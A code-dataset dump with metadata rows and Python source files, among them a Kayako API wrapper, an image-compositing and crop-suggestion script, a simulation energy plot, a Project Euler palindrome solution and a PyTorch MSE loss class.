hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9ba00e9b29b3ca03c6563bbca721e5ab24550cd4 | 469 | py | Python | mesonet/__init__.py | bf777/MesoNet | 87cd631e72fc2af596f97aa2b73f8e57b0cc27e6 | [
"CC-BY-4.0"
] | 2 | 2021-08-02T21:04:52.000Z | 2021-11-10T07:00:40.000Z | mesonet/__init__.py | bf777/MesoNet | 87cd631e72fc2af596f97aa2b73f8e57b0cc27e6 | [
"CC-BY-4.0"
] | 2 | 2021-12-02T10:47:00.000Z | 2022-03-07T20:28:11.000Z | mesonet/__init__.py | bf777/MesoNet | 87cd631e72fc2af596f97aa2b73f8e57b0cc27e6 | [
"CC-BY-4.0"
] | null | null | null | """
MesoNet
Authors: Brandon Forys and Dongsheng Xiao, Murphy Lab
https://github.com/bf777/MesoNet
Licensed under the Creative Commons Attribution 4.0 International License (see LICENSE for details)
"""
# __init__.py
from mesonet.utils import *
from mesonet.dlc_predict import predict_dlc
from mesonet.predict_regions import predict_regions
from mesonet.train_model import train_model
from mesonet.gui_start import gui_start
from mesonet.img_augment import img_augment
| 33.5 | 99 | 0.835821 | """
MesoNet
Authors: Brandon Forys and Dongsheng Xiao, Murphy Lab
https://github.com/bf777/MesoNet
Licensed under the Creative Commons Attribution 4.0 International License (see LICENSE for details)
"""
# __init__.py
from mesonet.utils import *
from mesonet.dlc_predict import predict_dlc
from mesonet.predict_regions import predict_regions
from mesonet.train_model import train_model
from mesonet.gui_start import gui_start
from mesonet.img_augment import img_augment
| 0 | 0 | 0 |
a54e4fcb9e12dd8b283e1118efefe5930ce03899 | 3,362 | py | Python | src/kayako/objects/custom_field.py | iXsystems/kayako-python-api-library | 5c43ae331904eac1a66301e2f40d29a4e52fd49d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/kayako/objects/custom_field.py | iXsystems/kayako-python-api-library | 5c43ae331904eac1a66301e2f40d29a4e52fd49d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/kayako/objects/custom_field.py | iXsystems/kayako-python-api-library | 5c43ae331904eac1a66301e2f40d29a4e52fd49d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ravi Sharma
#
# Distributed under the terms of the Lesser GNU General Public License (LGPL)
#-----------------------------------------------------------------------------
'''
Created on Feb 26, 2014
@author: ravi
'''
from lxml import etree
from kayako.core.lib import UnsetParameter
from kayako.core.object import KayakoObject
from kayako.exception import KayakoRequestError, KayakoResponseError
class CustomField(KayakoObject):
'''
Kayako Custom Field API Object.
customfieldid The custom field ID.
customfieldgroupid The custom field group id.
title The title of the custom field.
fieldtype The type of the custom field.
fieldname The field name of custom field.
defaultvalue The default value of custom field.
isrequired 1 or 0 boolean that controls whether or not field required.
usereditable 1 or 0 boolean that controls whether or not to edit the field by user.
staffeditable 1 or 0 boolean that controls whether or not to edit the field by staff.
regexpvalidate A regex string for validate.
displayorder The display order of the custom field.
encryptindb 1 or 0 boolean that controls whether or not field is encrypted.
description The description of the custom field.
'''
controller = '/Base/CustomField'
__parameters__ = [
'id',
'customfieldid',
'customfieldgroupid',
'title',
'fieldtype',
'fieldname',
'defaultvalue',
'isrequired',
'usereditable',
'staffeditable',
'regexpvalidate',
'displayorder',
'encryptindb',
'description',
]
@classmethod
@classmethod
@classmethod
| 35.020833 | 126 | 0.680845 | # -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ravi Sharma
#
# Distributed under the terms of the Lesser GNU General Public License (LGPL)
#-----------------------------------------------------------------------------
'''
Created on Feb 26, 2014
@author: ravi
'''
from lxml import etree
from kayako.core.lib import UnsetParameter
from kayako.core.object import KayakoObject
from kayako.exception import KayakoRequestError, KayakoResponseError
class CustomField(KayakoObject):
'''
Kayako Custom Field API Object.
customfieldid The custom field ID.
customfieldgroupid The custom field group id.
title The title of the custom field.
fieldtype The type of the custom field.
fieldname The field name of custom field.
defaultvalue The default value of custom field.
isrequired 1 or 0 boolean that controls whether or not field required.
usereditable 1 or 0 boolean that controls whether or not to edit the field by user.
staffeditable 1 or 0 boolean that controls whether or not to edit the field by staff.
regexpvalidate A regex string for validate.
displayorder The display order of the custom field.
encryptindb 1 or 0 boolean that controls whether or not field is encrypted.
description The description of the custom field.
'''
controller = '/Base/CustomField'
__parameters__ = [
'id',
'customfieldid',
'customfieldgroupid',
'title',
'fieldtype',
'fieldname',
'defaultvalue',
'isrequired',
'usereditable',
'staffeditable',
'regexpvalidate',
'displayorder',
'encryptindb',
'description',
]
@classmethod
def _parse_custom_field(cls, custom_field_tree):
params = dict(
id=custom_field_tree.get('customfieldid'),
customfieldid=id,
customfieldgroupid=cls._parse_int(custom_field_tree.get('customfieldgroupid')),
title=custom_field_tree.get('title'),
fieldtype=cls._parse_int(custom_field_tree.get('fieldtype')),
fieldname=custom_field_tree.get('fieldname'),
defaultvalue=custom_field_tree.get('defaultvalue'),
isrequired=cls._parse_int(custom_field_tree.get('isrequired')),
usereditable=cls._parse_int(custom_field_tree.get('usereditable')),
staffeditable=cls._parse_int(custom_field_tree.get('staffeditable')),
regexpvalidate=custom_field_tree.get('regexpvalidate'),
displayorder=cls._parse_int(custom_field_tree.get('displayorder')),
encryptindb=cls._parse_int(custom_field_tree.get('encryptindb')),
description=custom_field_tree.get('description'),
)
return params
@classmethod
def get_all(cls, api):
response = api._request('%s' % (cls.controller), 'GET')
tree = etree.parse(response)
return [CustomField(api, **cls._parse_custom_field(custom_field_tree)) for custom_field_tree in tree.findall('customfield')]
@classmethod
def get(cls, api, customfieldid):
response = api._request('%s/ListOptions/%s/' % (cls.controller, customfieldid), 'GET')
tree = etree.parse(response)
node = tree.find('option')
if node is None:
return None
params = cls._parse_custom_field(node)
return CustomField(api, **params)
def __str__(self):
return '<CustomField (%s): %s>' % (self.id, self.fieldname)
| 1,435 | 0 | 93 |
d6b30d1e7120d3e587e3c5909ed90c9d5af02c07 | 10,584 | py | Python | server/api/composer.py | notantony/Grid-Anchor-based-Image-Cropping-Pytorch | 32a2dea9151c123c8e589bd196450f56cf3ef7d1 | [
"MIT"
] | null | null | null | server/api/composer.py | notantony/Grid-Anchor-based-Image-Cropping-Pytorch | 32a2dea9151c123c8e589bd196450f56cf3ef7d1 | [
"MIT"
] | null | null | null | server/api/composer.py | notantony/Grid-Anchor-based-Image-Cropping-Pytorch | 32a2dea9151c123c8e589bd196450f56cf3ef7d1 | [
"MIT"
] | null | null | null | # # -*- coding: utf-8 -*-
import math
import random
import numpy as np
import heapq
from io import BytesIO
from PIL import Image, ImageOps
from server.api.crop_suggestor import CropSuggestorModel
from server.api.utils import compress_bg, read_image, nd_deserialize, np_isground, tiling_range, n_dim_iter, \
np_bg_goodness, np_iswater
from server.api.graphics import paste_obj
import json
import base64
cat_data = read_image('./input/obj/cat.png')
cat_obj = ObjImg(cat_data, "cat", "object;grounded", size_ratio=0.4, well_cropped=False)
dog_data = read_image('./input/obj/dog.png')
dog_obj = ObjImg(dog_data, "dog", "object;grounded", size_ratio=0.75, well_cropped=True)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
rhino_data = read_image('./input/obj/rhino.png')
rhino_obj = ObjImg(rhino_data, "rhino", "object;grounded", size_ratio=1.5)
zebra_data = read_image('./input/obj/zebra.png')
zebra_obj = ObjImg(zebra_data, "zebra", "object;grounded", size_ratio=1.5, well_cropped=True)
lion_data = read_image('./input/obj/lion.png')
lion_obj = ObjImg(lion_data, "zebra", "object;grounded", size_ratio=1.5)
giraffe_data = read_image('./input/obj/giraffe.png')
giraffe_obj = ObjImg(giraffe_data, "giraffe", "object;grounded", size_ratio=3.0)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
pirate_data = read_image('./input/obj/pirate.png')
pirate_obj = ObjImg(pirate_data, "pirate", "object;grounded", size_ratio=1.8)
boat_data = read_image('./input/obj/boat.png')
boat_obj = ObjImg(boat_data, "boat", "object;water", size_ratio=1.0, well_cropped=True)
parrot_data = read_image('./input/obj/parrot.png')
parrot_obj = ObjImg(parrot_data, "parrot", "object;air", size_ratio=1.0, well_cropped=True)
field_cm = loadnp('./input/bg/field_cm.json', 'colormap')
field_dm = loadnp('./input/bg/field_dm.json', 'depthmap')
field_bg = Image.open("./input/bg/field.jpg")
africa_cm = loadnp('./input/bg/africa_cm.json', 'colormap')
africa_dm = loadnp('./input/bg/africa_dm.json', 'depthmap')
africa_bg = Image.open("./input/bg/africa.jpg")
beach_cm = loadnp('./input/bg/beach_cm.json', 'colormap')
beach_dm = loadnp('./input/bg/beach_dm.json', 'depthmap')
beach_bg = Image.open("./input/bg/beach.jpg")
autumn_cm = loadnp('./input/bg/autumn_cm.json', 'colormap')
autumn_dm = loadnp('./input/bg/autumn_dm.json', 'depthmap')
autumn_bg = Image.open("./input/bg/autumn.jpg")
composer = ImageComposer()
# composer.compose(field_bg, [person_obj], field_cm, field_dm)
# composer.compose(field_bg, [cat_obj, person_obj], field_cm, field_dm)
import cv2
# composer.compose(africa_bg, [rhino_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [zebra_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj, giraffe_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj], africa_cm, africa_dm)
composer.compose(field_bg, [cat_obj, dog_obj], field_cm, field_dm)
# composer.compose(beach_bg, [parrot_obj, pirate_obj], beach_cm, beach_dm)
# composer.compose(autumn_bg, [person_obj], autumn_cm, autumn_dm) | 39.492537 | 123 | 0.614512 | # # -*- coding: utf-8 -*-
import math
import random
import numpy as np
import heapq
from io import BytesIO
from PIL import Image, ImageOps
from server.api.crop_suggestor import CropSuggestorModel
from server.api.utils import compress_bg, read_image, nd_deserialize, np_isground, tiling_range, n_dim_iter, \
np_bg_goodness, np_iswater
from server.api.graphics import paste_obj
class ObjImg():
def __init__(self, image_data, obj_class=None, obj_tags=None, size_ratio=1.0, pad=5, well_cropped=False):
image = Image.open(BytesIO(image_data)).convert('RGBA')
bbox = image.getbbox()
image = image.crop(bbox)
if pad != 0:
image = ImageOps.expand(image, pad)
self.image = image
self.size_ratio = float(size_ratio)
self.tags = set(obj_tags.split(";"))
self.well_cropped = well_cropped
self.expected_size = None
self.tiles_size = None
def is_grounded(self):
return 'grounded' in self.tags
def is_air(self):
return 'air' in self.tags
def is_bg_obj(self):
return 'bg_obj' in self.tags
def get_xy_ratio(self):
return float(self.image.size[0]) / self.image.size[1]
def normalize(self, tile_size, standart_size):
if standart_size is None:
self.expected_size = (int(self.size_ratio * self.image.size[0]), int(self.size_ratio * self.image.size[1]))
else:
self.expected_size = (int(self.size_ratio * standart_size * self.get_xy_ratio()), \
int(self.size_ratio * standart_size))
self.tiles_size = (int(math.ceil(float(self.expected_size[0]) / tile_size[0])), \
int(math.ceil(float(self.expected_size[1]) / tile_size[1])))
class ImageComposer():
def __init__(self, complexity=6):
self.complexity = complexity
def compose(self, bg_image, objs, bg_cm, bg_dm, search='complete', standart_size=None, tries=None, allow_not_all=True):
if search not in ['complete', 'random']:
raise ValueError("Unexpected `search` parameter value: {}".format(search))
# if search == 'complete' and tries is not None:
# raise ValueError("Parameter `tries` cannot be used with parameter `search` == 'complete'")
if not isinstance(standart_size, (int, float)) and standart_size not in [None, 'depth', 'compostition']:
raise ValueError("Unexpected `standart_size` parameter value: {}".format(search))
if bg_image.size[0] > bg_image.size[1]:
steps_x = self.complexity
steps_y = int(float(steps_x) * bg_image.size[1] / bg_image.size[0])
else:
steps_y = self.complexity
steps_x = int(float(steps_y) * bg_image.size[0] / bg_image.size[1])
steps = (steps_x, steps_y)
# [x][y]-like PIL upper-left corner format
bg_cm = np.flip(np.rot90(bg_cm, k=-1), axis=1)
bg_dm = np.flip(np.rot90(bg_dm, k=-1), axis=1)
cm_tiles = compress_bg(bg_cm, steps)
dm_tiles = compress_bg(bg_dm, steps)
if len(objs) == 0: # TODO
return []
step_pxs = (float(bg_image.size[0]) / steps[0], float(bg_image.size[1]) / steps[1])
isground_tiles = np_isground(cm_tiles)
bg_goodness_tiles = np_bg_goodness(cm_tiles)
dists_mean = dm_tiles[isground_tiles != 0].mean()
dist_std = 0.25 * bg_image.size[1] #* max(objs, key=lambda x: x.size_ratio).size_ratio
for obj in objs:
obj.normalize(step_pxs, dist_std)
compositions = []
for obj in objs:
x_range = list(tiling_range(0, steps_x, obj.tiles_size[0], 1))
y_range = list(tiling_range(0, steps_y, obj.tiles_size[1], 1))
compositions.append(n_dim_iter([x_range, y_range]))
good = []
for coord_list in n_dim_iter(compositions):
fail = False
bg_cur = bg_goodness_tiles.copy()
for obj, (x_pos, y_pos) in zip(objs, coord_list):
bottom_xy = (int(x_pos + math.ceil(float(obj.tiles_size[0]) / 2) - 1), y_pos + int(obj.tiles_size[1]) - 1)
if obj.is_grounded() and not isground_tiles[bottom_xy]:
fail = True
break
if obj.is_air() and isground_tiles[bottom_xy]:
fail = True
break
if not obj.is_bg_obj():
bg_cur[x_pos:x_pos + obj.tiles_size[0], y_pos:y_pos + obj.tiles_size[1]] -= 1
if np.min(bg_cur) < -1:
fail = True
if not fail:
core_bbox = None
if bg_cur[bg_cur == -1].any():
core_bbox = [float("inf"), float("inf"), float("-inf"), float("-inf")]
for i in range(steps_x):
for j in range(steps_y):
if bg_cur[i][j] == -1:
core_bbox[0] = min(core_bbox[0], int(i * step_pxs[0]))
core_bbox[1] = min(core_bbox[1], int(j * step_pxs[1]))
core_bbox[2] = max(core_bbox[2], int((i + 1) * step_pxs[0]))
core_bbox[3] = max(core_bbox[3], int((j + 1) * step_pxs[1]))
good.append((coord_list, core_bbox))
if tries is not None:
random.shuffle(good)
good = good[:tries]
path_bboxes = []
for i, (coord_list, core_bbox) in enumerate(good):
bg_cur = bg_image
for obj, (x_pos, y_pos) in zip(objs, coord_list):
bottom_xy = (int(x_pos + math.ceil(obj.tiles_size[0] / 2) - 1), y_pos + int(obj.tiles_size[1]) - 1)
if obj.is_air():
dist_coef = 1
else:
dist_coef = dists_mean / dm_tiles[bottom_xy]
new_size = (int(obj.expected_size[0] * dist_coef), int(obj.expected_size[1] * dist_coef))
x_coord = int(step_pxs[0] * (x_pos + float(obj.tiles_size[0]) / 2))
y_coord = int(step_pxs[1] * (y_pos + obj.tiles_size[1])) - 10
try:
# (not obj.well_cropped)
bg_cur = paste_obj(bg_cur, obj.image, new_size, lower_middle=(x_coord, y_coord), smooth=True)
except ValueError:
pass
path = "./output/tmp{}.png".format(i)
# bg_cur.save(path)
cv2.imwrite(path, bg_cur)
path_bboxes.append((path, core_bbox))
suggest(path_bboxes)
import json
import base64
def loadnp(filepath, name='data'):
with open(filepath, 'r') as file:
json_obj = json.load(file)
return nd_deserialize(json_obj, name)
cat_data = read_image('./input/obj/cat.png')
cat_obj = ObjImg(cat_data, "cat", "object;grounded", size_ratio=0.4, well_cropped=False)
dog_data = read_image('./input/obj/dog.png')
dog_obj = ObjImg(dog_data, "dog", "object;grounded", size_ratio=0.75, well_cropped=True)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
rhino_data = read_image('./input/obj/rhino.png')
rhino_obj = ObjImg(rhino_data, "rhino", "object;grounded", size_ratio=1.5)
zebra_data = read_image('./input/obj/zebra.png')
zebra_obj = ObjImg(zebra_data, "zebra", "object;grounded", size_ratio=1.5, well_cropped=True)
lion_data = read_image('./input/obj/lion.png')
lion_obj = ObjImg(lion_data, "zebra", "object;grounded", size_ratio=1.5)
giraffe_data = read_image('./input/obj/giraffe.png')
giraffe_obj = ObjImg(giraffe_data, "giraffe", "object;grounded", size_ratio=3.0)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
pirate_data = read_image('./input/obj/pirate.png')
pirate_obj = ObjImg(pirate_data, "pirate", "object;grounded", size_ratio=1.8)
boat_data = read_image('./input/obj/boat.png')
boat_obj = ObjImg(boat_data, "boat", "object;water", size_ratio=1.0, well_cropped=True)
parrot_data = read_image('./input/obj/parrot.png')
parrot_obj = ObjImg(parrot_data, "parrot", "object;air", size_ratio=1.0, well_cropped=True)
field_cm = loadnp('./input/bg/field_cm.json', 'colormap')
field_dm = loadnp('./input/bg/field_dm.json', 'depthmap')
field_bg = Image.open("./input/bg/field.jpg")
africa_cm = loadnp('./input/bg/africa_cm.json', 'colormap')
africa_dm = loadnp('./input/bg/africa_dm.json', 'depthmap')
africa_bg = Image.open("./input/bg/africa.jpg")
beach_cm = loadnp('./input/bg/beach_cm.json', 'colormap')
beach_dm = loadnp('./input/bg/beach_dm.json', 'depthmap')
beach_bg = Image.open("./input/bg/beach.jpg")
autumn_cm = loadnp('./input/bg/autumn_cm.json', 'colormap')
autumn_dm = loadnp('./input/bg/autumn_dm.json', 'depthmap')
autumn_bg = Image.open("./input/bg/autumn.jpg")
composer = ImageComposer()
# composer.compose(field_bg, [person_obj], field_cm, field_dm)
# composer.compose(field_bg, [cat_obj, person_obj], field_cm, field_dm)
import cv2
def suggest(path_bboxes, amount=10):
suggestor = CropSuggestorModel()
best_results = []
for path, core_bbox in path_bboxes:
image = cv2.imread(path)
# image = cv2.imread('/home/notantony/tmp/Grid-Anchor-based-Image-Cropping-Pytorch/output/tmp{}.png'.format(i))
image = image[:, :, (2, 1, 0)]
q = suggestor.suggest(image, core_bbox=core_bbox, n_results=1)
# print(q)
for score, box in q:
cropped = image[int(box[1]):int(box[3]), int(box[0]):int(box[2])]
if len(best_results) < amount:
heapq.heappush(best_results, (float(score), path, cropped[:, :, (2, 1, 0)]))
else:
heapq.heappushpop(best_results, (float(score), path, cropped[:, :, (2, 1, 0)]))
for i, (score, orig_path, img) in enumerate(sorted(best_results, key=lambda x: x[0], reverse=True)):
cv2.imwrite('./crops/{}.jpg'.format(i), img)
print("{} {} {}".format(i, score, orig_path))
# composer.compose(africa_bg, [rhino_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [zebra_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj, giraffe_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj], africa_cm, africa_dm)
composer.compose(field_bg, [cat_obj, dog_obj], field_cm, field_dm)
# composer.compose(beach_bg, [parrot_obj, pirate_obj], beach_cm, beach_dm)
# composer.compose(autumn_bg, [person_obj], autumn_cm, autumn_dm) | 7,083 | -5 | 306 |
9e2027a2a9cfcdbe7245e5fcb4e81bbb8703a867 | 3,726 | py | Python | sims/s130/plot-double-shear-cmp.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 1 | 2019-12-19T16:21:13.000Z | 2019-12-19T16:21:13.000Z | sims/s130/plot-double-shear-cmp.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | null | null | null | sims/s130/plot-double-shear-cmp.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 2 | 2020-01-08T06:23:33.000Z | 2020-01-08T07:06:50.000Z | import pylab
import tables
import math
import numpy
fig = pylab.figure(2)
tr_125 = pylab.loadtxt('../s125/s125-double-shear_totalEnergy')
tr_129 = pylab.loadtxt('../s129/s129-double-shear_totalEnergy')
tr_130 = pylab.loadtxt('../s130/s130-double-shear_totalEnergy')
refTe = tr_125[0,1]
pylab.plot(tr_125[:,0], tr_125[:,1], label='CFL 0.2')
pylab.plot(tr_129[:,0], tr_129[:,1], label='CFL 0.1')
pylab.plot(tr_130[:,0], tr_130[:,1], label='CFL 0.05')
pylab.legend(loc='lower left')
pylab.title('Total Energy History')
pylab.xlabel('Time [s]')
pylab.ylabel('Total Energy')
pylab.savefig('s125s129s130-double-shear-totalEnergy_cmp.png')
pylab.close()
print "CFL 0.2", tr_125[-1,1]-tr_125[0,1]
print "CFL 0.1", tr_129[-1,1]-tr_129[0,1]
print "CFL 0.05", tr_130[-1,1]-tr_130[0,1]
| 26.055944 | 107 | 0.506978 | import pylab
import tables
import math
import numpy
def projectOnFinerGrid(Xc, Yc, q):
dx = Xc[1]-Xc[0]
dy = Yc[1]-Yc[0]
nx = Xc.shape[0]
ny = Yc.shape[0]
# mesh coordinates
Xn = pylab.zeros((2*Xc.shape[0],), float)
Xn[0:nx] = Xc-0.25*dx
Xn[nx:] = Xc+0.25*dx
Xn.sort()
Yn = pylab.zeros((2*Yc.shape[0],), float)
Yn[0:nx] = Yc-0.25*dx
Yn[nx: ] = Yc+0.25*dx
Yn.sort()
qn = pylab.zeros((2*Xc.shape[0],2*Yc.shape[0]), float)
# node 0
for i in range(nx):
for j in range(ny):
qn[2*i,2*j] = 1/16.0*(9*q[i,j,0]+3*q[i,j,1]+3*q[i,j,3]+q[i,j,2])
# node 1
for i in range(nx):
for j in range(ny):
qn[2*i+1,2*j] = 1/16.0*(9*q[i,j,1]+3*q[i,j,2]+3*q[i,j,0]+q[i,j,3])
# node 2
for i in range(nx):
for j in range(ny):
qn[2*i+1,2*j+1] = 1/16.0*(9*q[i,j,2]+3*q[i,j,1]+3*q[i,j,3]+q[i,j,0])
# node 3
for i in range(nx):
for j in range(ny):
qn[2*i,2*j+1] = 1/16.0*(9*q[i,j,3]+3*q[i,j,2]+3*q[i,j,0]+q[i,j,1])
return Xn, Yn, qn
def projectOnFinerGrid_f(Xc, Yc, q):
dx = Xc[1]-Xc[0]
dy = Yc[1]-Yc[0]
nx = Xc.shape[0]
ny = Yc.shape[0]
# mesh coordinates
Xn = pylab.zeros((2*Xc.shape[0],), float)
Xn[0:nx] = Xc-0.25*dx
Xn[nx:] = Xc+0.25*dx
Xn.sort()
Yn = pylab.zeros((2*Yc.shape[0],), float)
Yn[0:nx] = Yc-0.25*dx
Yn[nx: ] = Yc+0.25*dx
Yn.sort()
qn = pylab.zeros((2*Xc.shape[0],2*Yc.shape[0]), float)
# node 0
qn[0:2*nx:2, 0:2*ny:2] = 1/16.0*(9*q[:,:,0]+3*q[:,:,1]+3*q[:,:,3]+q[:,:,2])
# node 1
qn[1:2*nx:2, 0:2*ny:2] = 1/16.0*(9*q[:,:,1]+3*q[:,:,2]+3*q[:,:,0]+q[:,:,3])
# node 2
qn[1:2*nx:2, 1:2*ny:2] = 1/16.0*(9*q[:,:,2]+3*q[:,:,1]+3*q[:,:,3]+q[:,:,0])
# node 3
qn[0:2*nx:2, 1:2*ny:2] = 1/16.0*(9*q[:,:,3]+3*q[:,:,2]+3*q[:,:,0]+q[:,:,1])
return Xn, Yn, qn
def projectOnFinerGrid_f3(Xc, Yc, q):
dx = Xc[1]-Xc[0]
dy = Yc[1]-Yc[0]
nx = Xc.shape[0]
ny = Yc.shape[0]
# mesh coordinates
Xn = pylab.zeros((2*Xc.shape[0],), float)
Xn[0:nx] = Xc-0.25*dx
Xn[nx:] = Xc+0.25*dx
Xn.sort()
Yn = pylab.zeros((2*Yc.shape[0],), float)
Yn[0:nx] = Yc-0.25*dx
Yn[nx: ] = Yc+0.25*dx
Yn.sort()
qn = pylab.zeros((2*Xc.shape[0],2*Yc.shape[0]), float)
c0 = q[:,:,0]
c1 = q[:,:,1]
c2 = q[:,:,2]
c3 = q[:,:,3]
c4 = q[:,:,4]
c5 = q[:,:,5]
c6 = q[:,:,6]
c7 = q[:,:,7]
# node 0
qn[0:2*nx:2, 0:2*ny:2] = (9*c7)/16.0+(3*c6)/16.0+(3*c5)/16.0+(9*c4)/16.0-(3*c3)/16.0-c2/8.0-(3*c1)/16.0
# node 1
qn[1:2*nx:2, 0:2*ny:2] = (3*c7)/16.0+(3*c6)/16.0+(9*c5)/16.0+(9*c4)/16.0-c3/8.0-(3*c2)/16.0-(3*c0)/16.0
# node 2
qn[1:2*nx:2, 1:2*ny:2] = (3*c7)/16.0+(9*c6)/16.0+(9*c5)/16.0+(3*c4)/16.0-(3*c3)/16.0-(3*c1)/16.0-c0/8.0
# node 3
qn[0:2*nx:2, 1:2*ny:2] = (9*c7)/16.0+(9*c6)/16.0+(3*c5)/16.0+(3*c4)/16.0-(3*c2)/16.0-c1/8.0-(3*c0)/16.0
return Xn, Yn, qn
fig = pylab.figure(2)
tr_125 = pylab.loadtxt('../s125/s125-double-shear_totalEnergy')
tr_129 = pylab.loadtxt('../s129/s129-double-shear_totalEnergy')
tr_130 = pylab.loadtxt('../s130/s130-double-shear_totalEnergy')
refTe = tr_125[0,1]
pylab.plot(tr_125[:,0], tr_125[:,1], label='CFL 0.2')
pylab.plot(tr_129[:,0], tr_129[:,1], label='CFL 0.1')
pylab.plot(tr_130[:,0], tr_130[:,1], label='CFL 0.05')
pylab.legend(loc='lower left')
pylab.title('Total Energy History')
pylab.xlabel('Time [s]')
pylab.ylabel('Total Energy')
pylab.savefig('s125s129s130-double-shear-totalEnergy_cmp.png')
pylab.close()
print "CFL 0.2", tr_125[-1,1]-tr_125[0,1]
print "CFL 0.1", tr_129[-1,1]-tr_129[0,1]
print "CFL 0.05", tr_130[-1,1]-tr_130[0,1]
| 2,878 | 0 | 69 |
bf053ecb91b45e0f5471a68564e3344dd8799600 | 414 | py | Python | Problem_04.py | Habbo3/Project-Euler | 1a01d67f72b9cfb606d13df91af89159b588216e | [
"MIT"
] | null | null | null | Problem_04.py | Habbo3/Project-Euler | 1a01d67f72b9cfb606d13df91af89159b588216e | [
"MIT"
] | null | null | null | Problem_04.py | Habbo3/Project-Euler | 1a01d67f72b9cfb606d13df91af89159b588216e | [
"MIT"
] | null | null | null | """
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.
Find the largest palindrome made from the product of two 3-digit numbers.
"""
biggest_number = 0
for i in range(999):
for n in range(999):
number = i*n
if str(number) == str(number)[::-1]:
if number > biggest_number:
biggest_number = number
print(biggest_number) | 29.571429 | 133 | 0.717391 | """
A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.
Find the largest palindrome made from the product of two 3-digit numbers.
"""
biggest_number = 0
for i in range(999):
for n in range(999):
number = i*n
if str(number) == str(number)[::-1]:
if number > biggest_number:
biggest_number = number
print(biggest_number) | 0 | 0 | 0 |
26992116356270d5c84cb8edcdb4c4bedbb9668c | 3,065 | py | Python | loss/image.py | RobinSandkuehler/r2n2 | 54fdedd4129a0d2f5c257f727afef9e3f6ab565b | [
"Apache-2.0"
] | 13 | 2020-01-13T15:25:44.000Z | 2022-02-21T10:56:51.000Z | loss/image.py | RobinSandkuehler/r2n2 | 54fdedd4129a0d2f5c257f727afef9e3f6ab565b | [
"Apache-2.0"
] | 1 | 2021-12-15T17:40:44.000Z | 2021-12-15T17:40:44.000Z | loss/image.py | RobinSandkuehler/r2n2 | 54fdedd4129a0d2f5c257f727afef9e3f6ab565b | [
"Apache-2.0"
] | 2 | 2021-08-03T16:31:46.000Z | 2022-03-16T22:00:37.000Z | # Copyright 2019 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
__author__ = "Robin Sandkuehler"
__copyright__ = "Copyright (C) 2019 Center for medical Image Analysis and Navigation"
import torch as th
# Loss base class (standard from PyTorch)
# conditional return
class MSE(_PairwiseImageLoss):
r""" The mean square error loss is a simple and fast to compute point-wise measure
which is well suited for monomodal image registration.
.. math::
\mathcal{S}_{\text{MSE}} := \frac{1}{\vert \mathcal{X} \vert}\sum_{x\in\mathcal{X}}
\Big(I_M\big(x+f(x)\big) - I_F\big(x\big)\Big)^2
Args:
fixed_image (Image): Fixed image for the registration
moving_image (Image): Moving image for the registration
size_average (bool): Average loss function
reduce (bool): Reduce loss function to a single value
"""
